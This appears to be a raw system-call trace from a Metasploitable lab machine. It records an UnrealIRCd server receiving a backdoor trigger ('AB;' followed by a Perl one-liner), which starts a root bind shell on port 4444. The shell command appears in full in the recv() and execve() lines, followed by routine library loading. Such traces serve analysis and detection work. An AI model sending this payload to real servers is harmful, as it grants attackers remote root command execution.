4519  07:18:31.035019 select(1024, [2 3 4 7 9], [], NULL, {0, 930000}) = 1 (in [2], left {0, 670000})

4519  07:18:31.301291 clock_gettime(CLOCK_MONOTONIC, {1521, 118311745}) = 0

4519  07:18:31.301312 time(NULL)        = 1495624711

4519  07:18:31.301336 time(NULL)        = 1495624711

4519  07:18:31.301381 gettimeofday({1495624711, 301400}, NULL) = 0

4519  07:18:31.301409 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:18:31.301451 clock_gettime(CLOCK_MONOTONIC, {1521, 118464011}) = 0

4519  07:18:31.301475 gettimeofday({1495624711, 301479}, NULL) = 0

4519  07:18:31.301486 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:18:31.301525 clock_gettime(CLOCK_MONOTONIC, {1521, 118537835}) = 0

4519  07:18:31.301536 accept(2, 0, NULL) = 5

4519  07:18:31.301556 getpeername(5, {sa_family=AF_INET, sin_port=htons(46565), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:18:31.301588 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:31.301601 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:31.301614 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:18:31.301626 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:18:31.301638 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:18:31.301649 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:18:31.301664 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:18:31.301680 clock_gettime(CLOCK_MONOTONIC, {1521, 118693973}) = 0

4519  07:18:31.301692 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:18:31.301705 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:31.301714 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:31.301724 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:18:31.301734 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:18:31.301751 send(6, "b\335\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:18:31.301769 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:18:31.301769 gettimeofday({1495624711, 301769}, NULL) = 0

4519  07:18:31.301770 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:18:31.306065 clock_gettime(CLOCK_MONOTONIC, {1521, 123082454}) = 0

4519  07:18:31.306082 recvfrom(6, "b\335\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\0\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:18:31.306123 close(6)          = 0

4519  07:18:31.306139 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:18:31.306153 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:18:31.306210 time(NULL)        = 1495624711

4519  07:18:31.306223 time(NULL)        = 1495624711

4519  07:18:31.306235 gettimeofday({1495624711, 306239}, NULL) = 0

4519  07:18:31.306247 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:18:31.306276 clock_gettime(CLOCK_MONOTONIC, {1521, 123288684}) = 0

4519  07:18:31.306286 gettimeofday({1495624711, 306290}, NULL) = 0

4519  07:18:31.306297 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 920000})

4519  07:18:31.381787 clock_gettime(CLOCK_MONOTONIC, {1521, 198796019}) = 0

4519  07:18:31.381787 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:18:31.381787 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381788 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381788 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381788 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381788 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381788 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381789 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381789 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381800 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381814 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381828 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381842 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381856 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381870 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381883 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381897 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381911 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381925 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381949 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.381992 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.382023 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.382037 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 200000}, ...}) = 0

4519  07:18:31.382054 gettimeofday({1495624711, 382057}, NULL) = 0

4519  07:18:31.382066 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:18:31.382107 clock_gettime(CLOCK_MONOTONIC, {1521, 199120288}) = 0

4519  07:18:31.382119 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:18:31.382148 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:18:31.382167 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:18:31.382180 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:18:31.382195 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7392

7392  07:18:31.382286 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7392  07:18:31.382301 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7392  07:18:31.382312 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7392  07:18:31.382326 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7392  07:18:31.382432 brk(0)            = 0x80f9000

7392  07:18:31.382462 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.382480 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3d000

7392  07:18:31.382498 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.382516 open("/etc/ld.so.cache", O_RDONLY) = 1

7392  07:18:31.382529 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7392  07:18:31.382549 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

7392  07:18:31.382559 close(1)          = 0

7392  07:18:31.382570 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.382586 open("/lib/libncurses.so.5", O_RDONLY) = 1

7392  07:18:31.382599 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7392  07:18:31.382699 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7392  07:18:31.382717 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f05000

7392  07:18:31.382730 mmap2(0xb7f32000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f32000

7392  07:18:31.382747 close(1)          = 0

7392  07:18:31.382759 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.382773 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7392  07:18:31.382788 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7392  07:18:31.382878 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7392  07:18:31.382896 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f01000

7392  07:18:31.382907 mmap2(0xb7f03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f03000

7392  07:18:31.382923 close(1)          = 0

7392  07:18:31.382940 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.382957 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7392  07:18:31.382971 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7392  07:18:31.383064 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7392  07:18:31.383082 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f00000

7392  07:18:31.383096 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db1000

7392  07:18:31.383107 mmap2(0xb7efa000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7efa000

7392  07:18:31.383123 mmap2(0xb7efd000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efd000

7392  07:18:31.383137 close(1)          = 0

7392  07:18:31.383160 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db0000

7392  07:18:31.383172 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db06b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7392  07:18:31.383227 mprotect(0xb7efa000, 4096, PROT_READ) = 0

7392  07:18:31.383264 munmap(0xb7f35000, 29913) = 0

7392  07:18:31.383290 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.383304 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7392  07:18:31.383324 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfc2a5e0) = -1 ENOTTY (Inappropriate ioctl for device)

7392  07:18:31.383354 brk(0)            = 0x80f9000

7392  07:18:31.383364 brk(0x80fa000)    = 0x80fa000

7392  07:18:31.383377 brk(0x80fb000)    = 0x80fb000

7392  07:18:31.383393 getuid32()        = 0

7392  07:18:31.383403 getgid32()        = 0

7392  07:18:31.383412 geteuid32()       = 0

7392  07:18:31.383422 getegid32()       = 0

7392  07:18:31.383466 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.383498 time(NULL)        = 1495624711

7392  07:18:31.383512 brk(0x80fc000)    = 0x80fc000

7392  07:18:31.383529 brk(0x80fd000)    = 0x80fd000

7392  07:18:31.383549 open("/proc/meminfo", O_RDONLY) = 1

7392  07:18:31.383584 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7392  07:18:31.383603 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

7392  07:18:31.383614 read(1, "MemTotal:      1035240 kB\nMemFree:        558620 kB\nBuffers:         64732 kB\nCached:         255076 kB\nSwapCached:          0 kB\nActive:         253956 kB\nInactive:       194788 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        558380 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4644 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            16508 kB\nSReclaimable:     8340 kB\nSUnreclaim:       8168 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7392  07:18:31.383700 close(1)          = 0

7392  07:18:31.383711 munmap(0xb7f3c000, 4096) = 0

7392  07:18:31.383723 brk(0x80fe000)    = 0x80fe000

7392  07:18:31.383749 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7392  07:18:31.383763 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7392  07:18:31.383775 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7392  07:18:31.383787 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7392  07:18:31.383800 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7392  07:18:31.383812 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7392  07:18:31.383825 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7392  07:18:31.383837 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7392  07:18:31.383851 uname({sys="Linux", node="metasploitable", ...}) = 0

7392  07:18:31.383899 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7392  07:18:31.383921 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7392  07:18:31.383953 brk(0x8100000)    = 0x8100000

7392  07:18:31.383966 getcwd("/etc/unreal", 4096) = 12

7392  07:18:31.383981 getpid()          = 7392

7392  07:18:31.383997 getppid()         = 4519

7392  07:18:31.384013 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7392  07:18:31.384034 stat64("/sbin/sh", 0xbfc2a5b8) = -1 ENOENT (No such file or directory)

7392  07:18:31.384046 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7392  07:18:31.384064 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7392  07:18:31.384088 socket(PF_FILE, SOCK_STREAM, 0) = 1

7392  07:18:31.384102 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7392  07:18:31.384114 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7392  07:18:31.384136 close(1)          = 0

7392  07:18:31.384148 socket(PF_FILE, SOCK_STREAM, 0) = 1

7392  07:18:31.384158 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7392  07:18:31.384169 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7392  07:18:31.384188 close(1)          = 0

7392  07:18:31.384201 open("/etc/nsswitch.conf", O_RDONLY) = 1

7392  07:18:31.384216 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7392  07:18:31.384233 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

7392  07:18:31.384244 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7392  07:18:31.384294 read(1, "", 4096) = 0

7392  07:18:31.384304 close(1)          = 0

7392  07:18:31.384314 munmap(0xb7f3c000, 4096) = 0

7392  07:18:31.384330 open("/etc/ld.so.cache", O_RDONLY) = 1

7392  07:18:31.384343 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7392  07:18:31.384359 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f35000

7392  07:18:31.384370 close(1)          = 0

7392  07:18:31.384381 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.384396 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7392  07:18:31.384411 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7392  07:18:31.384509 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7392  07:18:31.384527 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da7000

7392  07:18:31.384539 mmap2(0xb7dae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dae000

7392  07:18:31.384560 close(1)          = 0

7392  07:18:31.384572 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7392  07:18:31.384586 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7392  07:18:31.384600 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7392  07:18:31.384688 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

